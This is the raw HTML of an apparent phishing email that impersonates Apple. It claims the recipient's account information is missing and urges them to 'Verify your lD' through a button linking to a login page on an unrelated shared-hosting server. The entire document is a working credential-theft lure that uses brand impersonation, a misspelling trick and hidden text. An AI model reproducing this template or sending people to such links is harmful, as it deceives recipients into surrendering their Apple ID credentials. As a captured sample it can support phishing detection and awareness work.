<!-- 
  ______   ______    _______   _______  _______     .______   ____    ____         ___      .__   __.   ______   .__   __.  __       _______..___  ___.      ___      
 /      | /  __    |        |   ____||           |   _         /   /        /        |   |  |  /  __    |   |  | |  |     /       ||   /   |     /        
|  ,----'|  |  |  | |  .--.  ||  |__   |  .--.  |   |  |_)  |     /   /        /  ^      |   |  | |  |  |  | |   |  | |  |    |   (----`|    /  |    /  ^      
|  |     |  |  |  | |  |  |  ||   __|  |  |  |  |   |   _  <    _    _/        /  /_     |  . `  | |  |  |  | |  . `  | |  |            |  |/|  |   /  /_     
|  `----.|  `--'  | |  '--'  ||  |____ |  '--'  |   |  |_)  |     |  |         /  _____    |  |   | |  `--'  | |  |   | |  | .----)   |   |  |  |  |  /  _____    
 ______| ______/  |_______/ |_______||_______/    |______/      |__|        /__/     __ |__| __|  ______/  |__| __| |__| |_______/    |__|  |__| /__/     __ 
 
 -->




<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
    <style type="text/css">body { width: 100% !important;}</style>
  <style type="text/css">
html {pointer-events: none;}
    h4 
    {
        text-align: left;
    }

@media screen 
{

	.headerLineTitle
	{
		width:1.5in;
		display:inline-block;
		margin:0in;
		margin-bottom:.0001pt;
		font-size:11.0pt;
		font-family:"Calibri","sans-serif";
		font-weight:bold;
	}

	.headerLineText
	{
		display:inline;
		margin:0in;
		margin-bottom:.0001pt;
		font-size:11.0pt;
		font-family:"Calibri","sans-serif";
		font-weight:normal;
	}

   .pageHeader
   {
		font-size:14.0pt;
		font-family:"Calibri","sans-serif";
		font-weight:bold;
		visibility:hidden;
		display:none;
   }   
}

@media print 
{
	.headerLineTitle
	{
		width:1.5in;
		display:inline-block;
		margin:0in;
		margin-bottom:.0001pt;
		font-size:11.0pt;
		font-family:"Calibri","sans-serif";
		font-weight:bold;
	}

	.headerLineText
	{
		display:inline;
		margin:0in;
		margin-bottom:.0001pt;
		font-size:11.0pt;
		font-family:"Calibri","sans-serif";
		font-weight:normal;
	}

   .pageHeader
   {
		font-size:14.0pt;
		font-family:"Calibri","sans-serif";
		font-weight:bold;
		visibility:visible;
		display:block;
   }

}
</style>
</head>
  <body style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: #e9e9e9"  ><span class='headerLineTitle'>Subject:</span><span class='headerLineText'>Please Verify your account information !</span><br/><br/>
    <table style="WIDTH: 100%" cellspacing="0" cellpadding="0" border="0">
      <tbody>
        <tr>
          <td style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; BACKGROUND-COLOR: #e9e9e9" align="center" >
            <table cellspacing="0" cellpadding="0" width="600" border="0">
              <tbody>
                <tr>
                  <td style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; LINE-HEIGHT: 22px; PADDING-RIGHT: 10px" valign="top" align="center">
                    <div  style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #ffffff" ><br></div>
                  </td>
                </tr>
                <tr>
                  <td  style="BORDER-TOP-COLOR: #5b5b5b; BACKGROUND: #d9d9d9; BORDER-LEFT-COLOR: #5b5b5b; PADDING-BOTTOM: 0px; BORDER-BOTTOM-COLOR: #5b5b5b; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-RIGHT-COLOR: #5b5b5b; PADDING-RIGHT: 0px" valign="top">
                    <div>
                      <div  style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #898989"> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  <br></div>
                      <table  cellspacing="0" cellpadding="0" width="600" border="0">
                        <tbody>
                          <tr>
                            <td  style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #ffffff; BORDER-LEFT-COLOR: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; LINE-HEIGHT: 22px" valign="top" align="left"  >
                              <table  cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                <tbody>
                                  <tr>
                                    <td  style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; mso-table-lspace: 0; mso-table-rspace: 0" valign="top"></td>
                                  </tr>
                                </tbody>
                              </table>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                    <div  >
                      <table  cellspacing="0" cellpadding="0" width="600" border="0">
                        <tbody>
                          <tr>
                            <td  style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #ffffff; BORDER-LEFT-COLOR: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; LINE-HEIGHT: 22px" valign="top" align="left"  >
                              <table  cellspacing="0" cellpadding="0" width="200" align="left" border="0">
                                <tbody>
                                  <tr>
                                    <td  style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; mso-table-lspace: 0; mso-table-rspace: 0" valign="top">
                                      <div  style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474" >
                                        </br>
                                        <p align="center"><font size="5"><b>Apple Store ® </b><font></p>
                                      </div>
                                    </td>
                                  </tr>
                                </tbody>
                              </table>
                              <table  cellspacing="0" cellpadding="0" width="400" border="0">
                                <tbody>
                                  <tr>
                                    <td  style="; mso-table-lspace: 0; mso-table-rspace: 0" valign="top">
                                      <div  style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474" >
                                        <span  style="FONT-SIZE: 24px">
                                          <p style="FONT-SIZE: 24px"><strong style="FONT-SIZE: 14px"></strong></p>
                                          <p style="FONT-SIZE: 24px"><strong style="FONT-SIZE: 0px">.</strong></p>
                                        </span>
                                        This is an automated email, please do not reply<br>
                                      </div>
                                    </td>
                                  </tr>
                                </tbody>
                              </table>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                    <div  >
                      <table  cellspacing="0" cellpadding="0" width="600" border="0">
                        <tbody>
                          <tr>
                            <td  style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #ffffff; BORDER-LEFT-COLOR: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; LINE-HEIGHT: 22px" valign="top" align="left" >
                              <table  cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                <tbody>
                                  <tr>
                                    <td style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; mso-table-lspace: 0; mso-table-rspace: 0" valign="top"></td>
                                  </tr>
                                </tbody>
                              </table>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                    <div  >
                      <table  cellspacing="0" cellpadding="0" width="600" border="0">
                        <tbody>
                          <tr>
                            <td  style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #F4F4F4; BORDER-LEFT-COLOR: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; LINE-HEIGHT: 22px" valign="top" align="left"  >
                              <table  cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                <tbody>
                                  <tr>
                                    <td  style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 30px; PADDING-RIGHT: 30px; mso-table-lspace: 0; mso-table-rspace: 0" valign="top">
                                      <div  style="FONT-SIZE: 10px; FONT-FAMILY: Arial; COLOR: #747474" >
                                        <p align="justify"><span  style="FONT-SIZE: 15px"><strong>Dear Client,<br></strong>We've noticed that some of your account information appears to be missing or incorrect We need to verify your account information in order to continue using your Apple ID, Please Verify your account information by clicking on the link below</span></p>
                                        <p align="justify"><span style="FONT-SIZE: 12px"></span></p>
                                        <p align="justify"><span style="FONT-SIZE: 12px"><a onclick="return true" style="TEXT-DECORATION: none" href="https://webhosting1300.interserver.net/~newestwa/app/le/info/Login/"><span  style="FONT-SIZE: 14px; TEXT-DECORATION: none; BORDER-TOP: #797979 1px solid; FONT-FAMILY: Arial; BORDER-RIGHT: #797979 1px solid; WIDTH: 192px; MIN-WIDTH: 192px; BORDER-BOTTOM: #797979 1px solid; COLOR: #d9d9d9; TEXT-ALIGN: center; MARGIN: 2px; BORDER-LEFT: #797979 1px solid; DISPLAY: inline-block; BACKGROUND-COLOR: #797979"     ><strong>Verify your lD   </strong> </span></a></span></p>
                                      </div>
                                    </td>
                                  </tr>
                                </tbody>
                              </table>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                    <div  >
                      <table cellspacing="0" cellpadding="0" width="600" border="0">
                        <tbody>
                          <tr>
                            <td  style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #ffffff; BORDER-LEFT-COLOR: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; LINE-HEIGHT: 22px" valign="top" align="left" >
                              <table cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                <tbody>
                                  <tr>
                                    <br>
                                    <td style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 10px; mso-table-lspace: 0; mso-table-rspace: 0" valign="top"></td>
                                  </tr>
                                </tbody>
                              </table>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                    <div  >
                      <table  cellspacing="0" cellpadding="0" width="600" border="0">
                        <tbody>
                          <tr>
                            <td  style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #ffffff; BORDER-LEFT-COLOR: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; LINE-HEIGHT: 22px" valign="top" align="left"  >
                              <table cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                <tbody>
                                  <tr>
                                    <td  style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; PADDING-RIGHT: 0px; mso-table-lspace: 0; mso-table-rspace: 0" valign="top"></td>
                                  </tr>
                                </tbody>
                              </table>
                            </td>
                          </tr>
                        </tbody>
                      </table>
                    </div>
                  </td>
                </tr>
                <tr>
                  <td style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; LINE-HEIGHT: 22px; PADDING-RIGHT: 10px" valign="top" align="center">
                    <div  style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474">
                      <p align="center">Apple ID 2015 © All rights reserved</p>
                    </div>
                  </td>
                </tr>
              </tbody>
            </table>
          </td>
        </tr>
      </tbody>
    </table>
  </body>
</html>



